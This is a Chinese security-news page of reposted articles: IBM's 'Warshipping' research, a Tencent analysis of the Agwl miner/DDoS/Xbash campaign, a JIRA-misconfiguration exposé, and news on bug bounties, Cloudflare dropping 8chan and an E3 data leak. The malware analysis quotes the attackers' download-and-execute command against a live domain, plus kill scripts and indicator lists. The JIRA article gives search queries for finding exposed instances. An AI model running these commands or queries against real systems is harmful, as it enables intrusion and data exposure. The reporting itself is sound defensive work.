内容转载

= ̄ω ̄= 内容转载

IBM X-Force Red 发现新型网络风险:用邮寄方式入侵 WiFi 网络

IBM X-Force Red是隶属于IBM Security的一个资深安全团队,主要目的是发现和防范网络中存在的潜在漏洞。今天该团队发现黑客可以利用网络安全的潜在漏洞渗透网络,实现访问设备以及窃取设备上的数据。这项新技术被X-Force Red称为“Warshipping”,黑客会在包裹内部署一个名为“战舰”(WarShip)的巴掌大小计算机,并通过快递方式将其运输到指定机构,随后入侵这些机构的WiFi内部网络。 和Wardialing或者Wardriving这样的传统方式不同,Warshipping是一种支持3G网络的设备,因此避免了传统方式必须要在黑客设备范围内的局限性,能够更加灵活的进行远程和现场控制。 一旦到达目标站点,设备就会留意可用于探测网络的潜在数据包。 IBM X-Force Red的全球管理合伙人Charles Henderson记录了该团队进行被动无线攻击的过程: 举个例子我们听到了一次握手,一个信令表明设备建立了网络连接。其中一个WarShip设备将捕获的哈希传送到我们的服务器,然后我们利用后端进行破解,基本上就是用户的无线密码,然后获得WiFi的掌控权。 一旦WarShip成功入侵机构的WiFi,并且随后对所有与其连接的设备进行访问。该WarShip设备还会创建自己的流氓WiFi网络,迫使目标设备连接到该网络。自此该机构的关键信息,例如用户名和密码都会发送给黑客,以便于黑客进行后续的网络攻击。 查尔斯通过总结了该团队的调查结果:在这个warshipping项目中,遗憾的是,我们能够建立持久的网络连接并获得对目标系统的完全访问权限。 需要部署到站点的设备基本上由单板计算机(SBC)组成,该计算机在传统的手机可充电电池上运行。此外,使用现成的组件,制作成本仅约100美元,而且它看起来就像是用于学校展示的DIY项目,而不是用于入侵网络的设备。   (稿源:cnBeta,封面源自网络。)

Agwl 病毒团伙对 Linux 系统的三连击:挖矿、DDoS、删库勒索

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/wCjKwENZajw1vA9dmdgftQ   腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。 一、背景 腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。“Agwl”团伙于2018年7月被御见威胁情报中心发现,其攻击特点为探测phpStudy搭建的网站,并针对其网站搭建时使用的默认的MySQL弱口令进行爆破登录,从而植入挖矿以及远控木马。 该团伙早期入侵后植入的都是基于Windows平台的木马,其挖矿木马部分会首选清除其他挖矿程序、阻止其他挖矿木马访问矿池、独享系统资源。而最近的更新中,我们监测发现,“Agwl”团伙增加了对Linux系统的攻击,入侵成功后加入基于Linux系统执行的bash脚本代码s667。该脚本运行后会添加自身到定时任务,并进一步下载Linux平台下的CPU挖矿木马bashf和GPU挖矿木马bashg。 然而此时攻击并没有结束,“Agwl”团伙会继续植入Linux平台的DDoS病毒lst(有国外研究者命名为“Mayday”)以及勒索蠕虫病毒Xbash。Xbash勒索病毒会从C2服务器读取攻击IP地址段,扫描这些网络中的VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin服务器进行爆破攻击,爆破登录成功后不像其他勒索病毒那样去加密数据再勒索酬金,而是直接将数据库文件删除后骗取酬金,企业一旦中招将会遭受严重损失。 “Agwl”团伙攻击流程 二、详细分析 中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码并且开启在外网3306端口。在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。攻击者使用MySQL弱口令登录后,在web目录下执行Shell,并在其中添加植入挖矿木马的恶意代码。 入侵后执行shell命令为: cmd.exe /c “certutil.exe -urlcache -split -f http://wk.skjsl.com:93/Down.exe &Down.exe &del Down.exe&cd /tmp &&wget http://wk.skjsl.com:93/s667 &chmod 777 s667&./s667 “Agwl”团伙对Windows平台植入的木马为Down.exe,针对Linux平台植入的是s667。 Down.exe Down.exe为自解压程序,解压后释放一个hosts文件和7个BAT文件。根据解压命令,文件被释放到C:\Windows\debug\SYSTEM 目录下,首先被执行的是start.bat Start.bat主要功能为: 创建目录C:\ProgramData\Microsoft\test并设置为隐藏,将down.bat、open.bat、skycmd.bat拷贝到该目录中并安装为计划任务反复执行,对应的计划任务名分别为“SYSTEM”、“DNS”、“skycmd”;然后从www[.]kuaishounew.com下载wget.exe作为后续下载工具;最后启动start2.bat。 Start2.bat的功能为: 利用start.bat中下载的wget.exe从微软官方下载vc_redist.x64.exe,从www[.]kuaishounew.com下载unzip.exe(后续用到的解压工具)和hook.exe,然后执行install3.bat。 (vcredist_x64.exe是微软的Visual C运行时库,安装后能够在未安装VC的电脑上运行由 Visual C++开发的64位应用,该模块被下载以保证64位木马正常运行。) Install3.bat主要用于木马的三个服务“SYSTEM”、“DNS”、“skycmd”的安装和保持。 1、服务“SYSTEM” 执行的脚本为down.bat,主要功能为下载矿机程序wrsngm.zip进行挖矿,该矿机程序为开源挖矿程序xmr-stak修改而成,github地址https[:]//github.com/fireice-uk/xmr-stak。 使用矿池:wk.skjsl.com:3333 钱包:4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 该钱包上线时间不长,查询收益目前仅获得0.7个XMR 2、服务“DNS” 对应执行的脚本为open.bat。功能为替换本地域名解析文件hosts,然后启动挖矿程序。 替换后的hosts文件将其他的矿池域名解析指向127.0.0.1,阻止其正常访问从而独占挖矿所需的计算资源。从该文件中还会将木马原来的C2地址从111.230.195.174迁移至116.206.177.144。 open.bat还会启动qc.bat来清除入侵过程中在xampp、www、phpstudy目录下载残留的EXE木马,以及badboy.php、test00.php木马。 3、服务“skycmd” 执行脚本skycmd.bat。功能为下载skycmdst.txt,重命名为skycmdst.bat并执行,目前下载该文件为网页文件,但黑客可通过后台配置动态更改下载的恶意代码。 s667 s667为入侵Linux系统后首先执行的脚本。脚本判断当前是否是root权限,如果不是则下载lower23.sh到/tmp/目录并通过nohup bash命令执行;如果是root权限则添加下载执行s667的定时任务,每5分钟执行一次,然后下载rootv23.sh到/tmp/目录并通过nohup bash命令执行。 最终下载执行的bash脚本lower23.sh或root23.sh负责植入Linux版本挖矿木马、清理竞品挖矿木马以及植入其他病毒等功能。 在function kills()中对竞品挖矿木马进行清除: 1、按照进程名匹配(包括被安全厂商多次披露的利用redis入侵挖矿的木马“ddg*”、“sourplum”、”wnTKYg”)。 pkill -f sourplum pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi 2、按照矿池匹配,杀死连接指定矿池的进程 ps auxf|grep -v grep|grep “mine.moneropool.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:8080″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:3333″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “monerohash.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “/tmp/a7b104c270″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:6666″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:7777″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:443″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “stratum.f2pool.com:8888″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmrpool.eu” | awk ‘{print $2}’|xargs kill -9 3、按照端口匹配,杀死使用端口9999/5555/7777/14444进行tcp通信的进程 PORT_NUMBER=9999 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=5555 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=7777 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=14444 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 4、删除指定目录文件 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/index_bak rm -rf /tmp/httpd.conf rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270 rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq 在function downloadyam()中下载Linux挖矿程序bashg(由开源GPU挖矿程序xmr-stak编译)和配置文件pools.txt;下载Linux平台CPU挖矿程序bashf(采用开源挖矿程序XMRig编译)以及配置文件名config.json。两种挖矿程序均使用与攻击Windows平台时相同的门罗币矿池和钱包。 DDoS病毒 lower23.sh在完成挖矿功能后,还会植入基于Linux的DDoS病毒lst(国外厂商命名为Mayday) lst搜集以下信息,并将其保存至结构g_statBase中: 系统版本 CPU核心数及其时钟速率 CPU负载 网络负载 创建一个新线程CThreadTaskManager :: ProcessMain(),将开始攻击和终止攻击的命令放入执行队列。在此之后,创建一个新线程CThreadHostStatus :: ProcessMain(),在此线程中,CPU和网络负载的数据每秒更新一次,如果接到请求,可以随时将数据发送到C&C服务器。 然后创建20个线程,从任务队列中读取信息,并根据读取的信息启动攻击或终止攻击。 建立与C&C的连接后,进入处理来自C&C的消息的无限循环。如果命令具有参数,则C&C则会发送另外4个字节,病毒根据接收到的不同参数执行不同类型的DDoS攻击。 执行DDoS攻击命令协议如下: 0×01 发起攻击,参数定义攻击的类型和要使用的线程数。攻击类型由一个字节定义,该字节可以取值0x80到0x84,共有5种攻击类型: 0x80 – TCP洪水攻击。 0x81 – UDP洪水攻击。 0x82 – ICMP洪水攻击。 0x83,0x84 – 两次DNS洪水攻击。两种攻击都类似于0x81,除了端口53(DNS服务的默认端口)用作目标端口。 0x02 终止攻击。 0x03 更新配置文件。 0x04 用于将当前命令的执行状态发送到C&C服务器。 勒索蠕虫 lower23.sh继续植入在基于Linux平台执行的勒索蠕虫病毒Xbash Xbash为使用PyInstaller将Python代码打包生成的ELF格式可执行程序,用于感染Linux系统。使用工具pyi-archive_viewer可提取出其中的pyc文件,然后通过反编译程序将其还原成Python代码。 Xbash会通过弱口令爆破和已知的服务器组件漏洞进行攻击,而且会删除目标系统中的数据库,在删除数据后提示勒索比特币,然而并没有发现其具有恢复数据的功能。 扫描端口: HTTP:80,8080,8888,8000,8001,8088 VNC:5900,5901,5902,5903 MySQL:3306 Memcached:11211 MySQL/MariaDB:3309,3308,3360 3306,3307,9806,1433 FTP:21 Telnet:23,2233 PostgreSQL:5432 Redis:6379,2379 ElasticSearch:9200 MongoDB:27017 RDP:3389 UPnP/SSDP:1900 NTP:123 DNS:53 SNMP:161 LDAP:389 Rexec:512 Rlogin:513 Rsh:514 Rsync:873 Oracle数据库:1521 CouchDB:5984 对于某些服务,如VNC,Rsync,MySQL,MariaDB,Memcached,PostgreSQL,MongoDB和phpMyAdmin,如果相关端口打开,则使用内置的弱用户名/密码字典进行爆破登录 爆破登录成功后对用户的数据库进行删除: 然后在数据库中创建勒索提示文本PLEASE_README_XYZ,勒索金额为0.02个比特币: Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not recived your payment,we will leak your database’, LygJdH8fN7BCk2cwwNBRWqMZqL1′,’backupsql@pm.me 三、安全建议 加固服务器,修补服务器安全漏洞,对于phpStudy一类的集成环境,在安装结束后应及时修改MySQL密码为强密码,避免被黑客探测入侵。 服务备份重要数据,并进行内网外网隔离防止重要数据丢失。检查并去除VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin等服务器使用的弱口令。 网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。 使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 116.206.177.144 Domain down.ctosus.ru wk.skjsl.com fk3.f3322.org sbkcbig.f3322.net URL http[:]//down.ctosus.ru/bat.exe http[:]//wk.skjsl.com:93/s667 http[:]//wk.skjsl.com:93/lowerv23.sh http[:]//wk.skjsl.com:93/rootv23.sh http[:]//wk.skjsl.com:93/xlk http[:]//wk.skjsl.com/wrsngm.zip http[:]//wk.skjsl.com/downulr.txt http[:]//wk.skjsl.com/config.sjon http[:]//wk.skjsl.com/bashf http[:]//wk.skjsl.com/bashg http[:]//wk.skjsl.com/pools.txt http[:]//wk.skjsl.com/lst http[:]//wk.skjsl.com/XbashH http[:]//wk.skjsl.com/NetSyst96.dll http[:]//www.kuaishounew.com/Down.exe http[:]//www.kuaishounew.com/apps.txt http[:]//www.kuaishounew.com/hook.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/office.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/hosts http[:]//116.206.177.144/wrsngm.zip http[:]//fk3.f3322.org/skycmdst.txt md5 51d49c455bd66c9447ad52ebdb7c526a fb9922e88f71a8265e23082b8ff3d417 cacde9b9815ad834fc4fb806594eb830 17f00668f51592c215266fdbce2e4246 40834e200ef27cc87f7b996fe5d44898 3897bdb933047f7e1fcba060b7e49b40 39ea5004a6e24b9b52349f5e56e8c742 8fdfe319255e1d939fe5f4502e55deee 13f337029bae8b4167d544961befa360 1b93e030d2d6f1cef92b2b6323ff9e9e 589ba3aac5119fc4e2682bafb699727b 82d28855a99013c70348e217c162ceb9 门罗币钱包1: 4Ak2AQiC1R4hFmvfSYRXfX6JSjR6YN9E81SRvLXRzeCefRWhSXq3SKDf8ZEFmpobNkXmgXnqA3CGKgaiAEJ2pjYi8BeQcn7 门罗币钱包2: 4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 比特币钱包: 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 邮箱: backupsql@pm.me 参考链接 https://www.freebuf.com/column/195035.html https://www.freebuf.com/column/178753.html https://securelist.com/versatile-ddos-trojan-for-linux/64361/ https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

特朗普指责谷歌:在大选期间有“非常不合法的”行为

北京时间8月7日上午消息,据路透社报道,美国总统特朗普周二指责谷歌,称谷歌试图破坏他的2016年竞选活动,并警告在2020年大选到来之际,自己正“非常密切地”关注谷歌。 特朗普指责谷歌有“非常不合法的”行为,但并未拿出证据,也未正式控告。 白宫代表未立即回应政府将对谷歌采取何种措施的问题。 而谷歌发言人表示:“出于政治目的扭曲结果将伤害我们的业务,违背我们向所有用户提供有帮助的内容的使命。” 特朗普屡次抨击谷歌等多家科技企业,提升收紧监管的可能性。一些保守派人士指责这些科技公司不公平对待客户。   (稿源:新浪科技,封面源自网络。)

微软成立 Azure 安全实验室:最高悬赏 30 万美元

Azure是目前微软发展最快的业务之一,在提升全球覆盖率和使用率的同时微软希望将其打造成为数字领域的诺克斯堡(Fort Knox,美国最安全的小镇)。微软刚刚宣布成立了Azure安全实验室,并且欢迎世界各地的安全专家通过测试Azure安全漏洞来换取奖金报酬。 微软首席安全PM经理Kymberlee Price解释称:“Azure安全实验室的隔离允许我们提供新的东西:研究人员不仅可以研究Azure中的漏洞,还可以尝试进行修复。那些有权访问Azure安全实验室的人可以尝试基于场景的挑战,获得300,000美元的最高奖励。” 愿意加入微软新Azure安全实验室的安全研究人员可以在此页面上填写申请。新的悬赏项目对于Azure生态系统来说无疑是个好消息,它能够为使用该业务的所有客户提供更安全的环境。 Price表示:“为了感谢他们的努力以及在产生实质性危害之前缓解和解决这些问题,在过去12个月中我们已经累计发放了440万美元的悬赏。我们感谢整个行业的安全合作伙伴,并相信我们今天宣布的新计划将有助于进一步保护Azure生态系统。”   (稿源:cnBeta,封面源自网络。)  

为更快寻找 iOS 漏洞 苹果将向安全专家提供开发版 iPhone

苹果计划向安全研究人员提供特有的iPhone型号,以便于他们能更轻松的找到iOS系统的漏洞。援引福布斯报道,苹果计划在本周晚些时候召开的黑帽安全会议上宣布这条消息。 并非所有安全专家都能获得特制iPhone,仅面向此前受到苹果邀请参与BUG悬赏计划的安全研究人员。通过该计划,研究人员可以通过向苹果披露iOS漏洞以获得奖励。 一些Giulio Zompetti收藏的“dev-fused”版iPhone 图片来自于 Giulio Zompetti 那么和面向普通消费者的iPhone相比,这些特制iPhone有何不同? 一位知情人士透露,这些iPhone本质上均为“开发设备”。相比较面向普通消费者的已锁iPhone,允许开发者做更多的事情。例如,允许开发者访问传统消费者版本中不允许访问的iOS系统。更为重要的是,开发者在这些特制iPhone上能够允许停止处理器运行以及检查内存中是否存在漏洞。 一台安装在支架上的“dev-fused”版iPhone Image: Motherboard 虽然这些iPhone具备更高的自由度,但这些iPhone并不会像给内部苹果开发人员以及安全团队那样功能丰富。例如,使用这些设备的安全研究人员可能无法解密iPhone固件。目前市场上也有一些iPhone开发者机型,但是这些设备通常在黑市上销售,而且价格非常高昂。 在黑市上这些iPhone被称之为“dev-fused”版iPhone。这些“dev-fused”版iPhone并未完成量产阶段,并且取消了诸多安全功能,Motherboard在报道中将其描述为“准越狱设备”(pre-jailbroken devices)。“dev-fused”版iPhone非常罕见,如果被偷运出苹果在黑市上可以卖出数千美元。这些iPhone拥有非常高的价值,因为这些可以用于查找影响iPhone现有版本的漏洞。 一些Giulio Zompetti收藏的“dev-fused”版iPhone 图片来自于 Giulio Zompetti 世界上最知名的iOS安全研究人员之一Luca Todesco向Motherboard透露:“如果你是攻击者,要么进行暴力破解要么花费数千美元买这样一台iPhone。而不少人都选择了第二种。”Motherboard随后在推特上发现了不少出售“dev-fused”版iPhone的用户,费用最低在1800美元左右。这些卖家同时还表示他们向多名安全专家提供“dev-fused”版iPhone,而且相信很多破解iPhone的大型安全公司也在使用这些手机。不过也有卖家提供的“dev-fused”版iPhone价格更高,Motherboard发现有个iPhone XR版本售价高达20000美元。 与此同时,该报道称苹果也计划推出Mac赏金计划。这类似于iOS bug奖励,并奖励安全研究人员在macOS中发现的漏洞。早在二月份,一位安全研究人员详细介绍了macOS漏洞来访问Keychain密码,但由于缺少针对macOS的bug赏金计划,他拒绝与Apple分享详细信息。尽管该公司没有公开宣布错误赏金计划,但最终研究人员确实与苹果分享了该漏洞的详细信息。   (稿源:cnBeta,封面源自网络。)

破坏型攻击爆发:制造业沦为重灾区

研究人员表示在过去6个月中网络攻击所造成的破坏力翻倍,而且受影响的组织中有50%属于制造业。基于近阶段的网络攻击,本周一IBM的X-Force IRIS事件响应团队发布了新的安全研究报告,强调破坏型恶意软件正在快速爆发。通过对恶意代码的分析发现,诸如Industroyer,NotPetya或Stuxnet在内的恶意程序不再是纯碎的窃取数据和秘密监控,而是造成更有破坏力的伤害。这些破坏行为包括锁定系统、让PC崩溃、渲染服务不可操作以及删除文件等等。 研究人员表示:“在历史上,像Stuxnet,Shamoon和Dark Seoul这样的破坏性恶意软件通常是被有国家背景的黑客所使用。不过自2018年年末以来,网络攻击份子开始不断将这些破坏型代码整合到自己的攻击中,例如LockerGoga和MegaCortex这样的新型勒索软件。” 而制造业是这些攻击的主要目标,目前曝光的案件中50%以上和工业公司有关。其中石油、天然气和教育领域的组织是重灾区,非常容易受到这种类型的攻击。最常见的初步感染手段就是网络钓鱼电子邮件,然后窃取进入内部网络所需要的电子凭证,注水漏洞攻击,劫持目标连接从而让对方妥协。 在发动恶意攻击之前,一些黑客将潜伏在公司系统中数月。IBM的X-Force IRIS事件响应团队的全球补救负责人Christopher Scott表示:“目前在破坏型恶意软件中存在另种攻击行为,前期保持缓慢发展,直到收集到需要的所有信息才会进行破坏;而另一种则是单纯的入侵然后破坏。” 报告中称当一家企业遭受破坏型恶意软件攻击之后,平均会有12000个工作站受到损坏,并且在攻击事件发生之后可能需要512个小时或者更长时间才能恢复。在一些极端情况下,恢复时间甚至可以延长到1200个小时。而大公司的恢复成本非常高,平均成本高达2.39亿美元。作为对比,Ponemon Institute估计,平均数据泄露将花费392万美元。   (稿源:cnBeta,封面源自网络。)

Cloudflare 宣布终止对 8chan 的服务 后者或面临潜在 DDoS 攻击

据外媒The Verge报道,Cloudflare是一项帮助网站缓解DDoS攻击的在线基础设施服务。在周末德克萨斯州埃尔帕索发生致命的白人民族主义枪击事件后,Cloudflare宣布终止对在匿名贴图讨论版网站8chan的服务。枪手Patrick Crusius被曝曾在8chan发布仇恨言论。 8chan的所有者已经被告知他们的服务将被撤销,该网站可能面临导致其完全关闭的潜在DDoS攻击。Cloudflare将于太平洋时间周一午夜正式关闭服务。目前尚不清楚8chan的所有者是否已找到新的安全服务来取代Cloudflare。 8chan的所有者没有回应重复的评论请求。 Cloudflare的联合创始人兼首席执行官Matthew Prince在周日晚上的一篇博客文章中写道:“虽然从我们的网络中删除8chan会让我们失去热情,但却无法解决为什么仇恨网站在网上恶化。它没有解决为什么发生大规模枪击事件。它没有解决为什么部分人会不再抱有幻想,将其变成仇恨。“ “在采取这一行动时,我们已经解决了我们自己的问题,但我们还没有解决互联网问题,”他继续说道。 8chan的创始人Fredrick Brennan感谢Cloudflare终止其服务,并在推文中说:“最终这场噩梦可能会结束。” 周六在埃尔帕索发生枪击事件造成至少20人死亡,二十多人受伤,这是今年发生的第三次与8chan和白人民族主义意识形态有关的大规模枪击事件。第一次是在新西兰克赖斯特彻奇发生的枪击事件, 当时Cloudflare拒绝撤销其服务。 Cloudflare之前已经终止为其他包含仇恨言论的网站提供服务,其中最著名的是新纳粹网站The Daily Stormer。然而,Cloudflare竞争对手为The Daily Stormer提供服务,该网站至今仍然可用。 “不幸的是,我们今天采取的行动不会在网上修复仇恨,”Prince写道。“它几乎肯定不会从互联网上删除8chan。但这是正确的做法。”   (稿源:cnBeta,封面源自网络。)

错误的 JIRA 配置导致数百家财富 500 强公司的数据泄露

来自国外的开发者 Avinash Jain 在8月2日时发表了一篇文章,揭露全球范围内使用非常广泛的问题跟踪软件 JIRA 由于错误的配置导致成千上万的公司泄露了内部的员工以及项目数据的问题。Jain 同时提供了如何去找出这些存在漏洞的 JIRA 系统的方法。 以下是 Jain 文章的内容: 几个月前,我发表了一篇关于“JIRA 泄露 NASA 员工和项目数据”的文章,我能够在这些泄露的数据中找到NASA员工的详细信息,包括用户名、电子邮件、ID 以及他们的内部项目详细信息。他们用的就是 Atlassian 的 JIRA 工具 – 一个独立任务跟踪系统/项目管理软件,全球约有135,000家公司和组织在使用。 而这次数据泄漏的根本原因是 JIRA 中存在的疯狂错误配置。 为什么使用“狂野”一词,是因为如果你的公司也在使用相同的错误配置,那么我也可以访问你们内部的用户数据和内部项目详细信息。 受影响的客户包括 NASA,谷歌,雅虎,Go-Jek,HipChat,Zendesk,Sapient,Dubsmash,西联汇款,联想,1password,Informatica等公司,以及世界各地政府的许多部门也遭受同样的影响,如欧洲政府,联合国,美国航天局,巴西政府运输门户网站,加拿大政府财政门户网站之一等。 接下来我将分享我在Jira(Atlassian任务跟踪系统/项目管理软件)中发现的那个关键漏洞,或者更具体地说是导致组织和公司内部敏感信息泄露的错误配置问题。 让我们看看究竟是什么问题! 在 JIRA 中创建过滤器或仪表板时,它提供了一些可见性选项。问题是由于分配给它们的权限错误。当在JIRA中创建项目/问题的过滤器和仪表板时,默认情况下,可见性分别设置为“所有用户”和“所有人”,而不是与组织中的每个人共享,所以这些信息被完全公开了。JIRA 中还有一个用户选择器功能,它提供了每个用户的用户名和电子邮件地址的完整列表。此信息泄露是 JIRA 全局权限设置中授权配置错误的结果。由于权限方案错误,以下内部信息容易受到攻击: 所有账号的雇员姓名和邮箱地址 雇员的角色 项目信息、里程碑等 任何拥有该系统链接的人都可以从任何地方访问它们并获取各种敏感信息,由于这些链接可能被所有搜索引擎编入索引,因此任何人都可以通过一些简单的搜索查询轻松找到它们。 来看看一些泄露的数据: 1. NASA员工数据 2. JIRA 过滤器公开访问 3. NASA 项目详情 如上所示,由于这些配置错误的JIRA设置,它会公开员工姓名,员工角色,即将到来的里程碑,秘密项目以及各种其他信息。 现在,我来介绍一下如何通过 来自“Google dorks”(搜索查询)找到这些公开曝光的用户选择器功能、过滤器以及许多公司的仪表板的链接/URL。 我通过 Google 的搜索如下: inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log 然后结果就出来了: 此查询列出了其URI中具有“UserPickerBrowser”的所有URL,以查找公开而且不需要经过身份验证的所有配置错误的 JIRA 用户选择器功能。 谷歌收购Apigee员工数据公开曝光 Go-jek 员工数据公开曝光 还有前面提到的 NASA 泄露的数据。 对于过滤器和仪表板,我们可以看到这些过滤器和仪表板的URL包含“Managefilters”和“ConfigurePortal”作为一部分。 我继续创建搜索查询 – inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public ) 此查询列出了所有在其URI中具有“Managefilters”并且文本为“Public”的URL,以便找到所有公开暴露且未经过身份验证的错误配置的JIRA过滤器。 结果如下: inurl:/ConfigurePortalPages!default.jspa?view=popular 此查询列出其URI中具有“ConfigurePortalPages”的所有URL,以查找公开公开的所有JIRA仪表板。 在进一步侦察(信息收集)时,我发现各公司都有“company.atlassian.net”格式的JIRA URL,因此如果您想检查任何配置错误的过滤器,仪表板或用户选择器功能的公司,您需要 只需将他们的名字放在URL中 – https://companyname.atlassian.net/secure/popups/UserPickerBrowser.jspa https://companyname.atlassian.net/secure/ManageFilters.jspa?filterView=popular https://companyname.atlassian.net/secure/ConfigurePortalPages!default.jspa?view=popular 数以千计的公司过滤器,仪表板和员工数据被公开曝光。 这是因为设置为过滤器和仪表板的错误权限方案因此甚至提供了对未登录用户的访问权限,从而导致敏感数据泄漏。 我在数百家公司中发现了几个错误配置的JIRA帐户。 一些公司来自Alexa和Fortune的顶级名单,包括像NASA,谷歌,雅虎等大型巨头和政府网站,以及 – 巴西政府对Jira过滤器错误配置了他们的道路和运输系统,因此暴露了他们的一些项目细节,员工姓名等,这些都是在与他们联系后修复的。 同样,联合国意外地将他们的Jira过滤器和Jira仪表板公开,因此暴露了他们的内部项目细节,秘密里程碑等,在我报告之后由他们修复并且在他们的名人堂名单中得到奖励。 当他们的商业金融软件系统和解决方案具有相同的Jira错误配置并暴露其内部敏感项目和员工细节时,甚至欧洲政府也遭受了同样的风险。 在我向他们发送报告后,他们也对其进行了修复,并在其名人堂名单中得到了认可。 这些公开可用的过滤器和仪表板提供了详细信息,例如员工角色,员工姓名,邮件ID,即将到来的里程碑,秘密项目和功能。 而用户选择器功能公开了内部用户数据。 竞争对手公司有用的信息,可以了解其竞争对手正在进行的即将到来的里程碑或秘密项目的类型。 即使是攻击者也可以从中获取一些信息并将其与其他类型的攻击联系起来。 显然,它不应该是公开的,这不是安全问题,而是隐私问题。 我向不同的公司报告了这个问题,一些人给了我一些奖励,一些人修复了它,而另一些人仍在使用它。 虽然这是一个错误配置问题,Atlassian(JIRA)必须处理并更明确地明确“任何登录用户”的含义,无论是JIRA的任何登录用户还是仅登录属于特定 JIRA 公司帐户的用户。   (稿源:开源中国,封面源自网络。)

网站漏洞导致超过 2000 名参与报道 E3 的记者个人信息泄漏

在参与报道了全球最大的视频游戏大会E3之后,由于组织方系统存在的安全漏洞导致大量记者的个人联系信息被公开曝光。在报告中称目前已经有超过2000人受到影响,除了各大新闻机构和媒体的记者、编辑之外,还有YouTube和Twitch等视频网站上的网红主播,以及高盛、IMDb和其他公司的工作人员。 本周六E3游戏展的组织方Entertainment Software Association(简称ESA)向这些受影响的记者发出了电子邮件警告,而这些记者都通过官方渠道注册参与了今年6月在洛杉矶会议中心举办的游戏大展,并获得了新闻报道证书。 在发送给记者的电子邮件中写道:“我们为ESA会员和参展商在一个密码保护的参展商网站上提供了媒体列表,方便用户联系媒体进行报道,以及更好地传播参展方的展示内容。而在过去20多年来一直没有问题。” 在发现这个问题之后,ESA在本周五已经发布告示称参展商网站存在缺陷,导致记者和媒体名单公布于众,随后ESA立即关闭了这个网站。 YouTuber Sophia Narwitz早些时候报道了这个漏洞并注意到她已经联系了ESA,它说可以通过点击公共E3网站页面上标有“注册媒体列表”的链接来下载一份包含联系人列表的电子表格。 她表示在这份名单中还包括了私人的住址信息,任何以新闻或内容创作者身份出席E3的人都可能受到影响。 ESA表示对此事件感到遗憾,并已采取措施确保不再发生这种情况。   (稿源:cnBeta,封面源自网络。)

谷歌暂停评估语音助手在欧录音 7月承认泄露用户数据

